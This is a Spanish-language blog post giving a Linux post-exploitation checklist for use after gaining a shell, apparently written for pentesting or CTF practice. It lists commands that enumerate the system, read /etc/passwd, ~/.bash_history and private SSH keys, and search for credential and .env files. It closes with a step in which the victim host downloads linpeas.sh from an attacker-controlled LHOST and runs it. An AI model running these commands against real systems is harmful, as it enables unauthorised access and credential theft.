blog
Post-Explotación en Linux: Qué Hacer Tras Entrar
25 Mar 2026
Ya tienes shell. ¿Y ahora qué? Este es mi checklist habitual.
Enumeración del sistema
uname -a
cat /etc/os-release
hostname
id && whoami
ip a
Usuarios y grupos
cat /etc/passwd
cat /etc/group
ls /home/
last
who
Archivos interesantes
find / -name "*.txt" 2>/dev/null | grep -i "flag\|pass\|cred\|secret"
find / -perm -4000 2>/dev/null # SUID
sudo -l
crontab -l && cat /etc/crontab
Historial y credenciales
cat ~/.bash_history
cat ~/.ssh/id_rsa
find / -name "config" -o -name ".env" 2>/dev/null
Transferir herramientas
# Desde Kali
python3 -m http.server 8080
# En víctima
wget http://LHOST:8080/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh